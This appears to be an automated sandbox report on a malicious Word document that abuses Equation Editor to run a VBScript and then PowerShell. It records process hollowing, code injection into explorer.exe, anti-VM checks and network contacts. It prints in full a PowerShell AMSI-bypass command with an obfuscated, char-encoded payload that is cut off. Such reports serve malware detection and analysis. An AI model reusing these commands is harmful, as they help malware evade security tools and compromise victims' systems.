          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k......3.............................}..v....x.3.....0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................4k......T.............................}..v......3.....0.......................`.......................
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
          Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE974.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: RFQ-18072 QPHN .docStatic file information: File size 2186552 > 1048576
          Source: Binary string: cmmon32.pdb source: calc.exe, 0000000B.00000002.533017208.0000000000030000.00000040.00020000.sdmp, calc.exe, 0000000B.00000002.533290649.0000000000314000.00000004.00000020.sdmp
          Source: Binary string: cmmon32.pdbr2v source: calc.exe, 0000000B.00000002.533017208.0000000000030000.00000040.00020000.sdmp, calc.exe, 0000000B.00000002.533290649.0000000000314000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.493968976.00000000004A0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.533434847.0000000000790000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.533685912.0000000000910000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.495023478.0000000000600000.00000004.00000001.sdmp, cmmon32.exe
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_004168F2 push edi; iretd
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00417A03 push edi; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D56C push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00417D6E push 00000013h; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D502 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D50B push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_004175E0 push ds; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00405F1A push ebx; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007ADFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F5DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009D50B push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009D502 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009D56C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_000975E0 push ds; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_000968F2 push edi; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_00097A03 push edi; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_00097D6E push 00000013h; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_00085F1A push ebx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E4E9B5 push esp; retn 0000h
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E4EB02 push esp; retn 0000h
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E4EB1E push esp; retn 0000h

          Persistence and Installation Behavior:

          barindex
          Creates processes via WMIShow sources
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 448Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2580Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2580Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 800Thread sleep time: -780000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2116Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1480Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409AB0 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: explorer.exe, 0000000C.00000000.500758878.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000C.00000000.500758878.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000C.00000000.581005892.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\calc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409AB0 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0040ACF0 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.eminkoy.com
          Source: C:\Windows\explorer.exeDomain query: www.towne-kitchen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 170000
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 7EFDE008
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
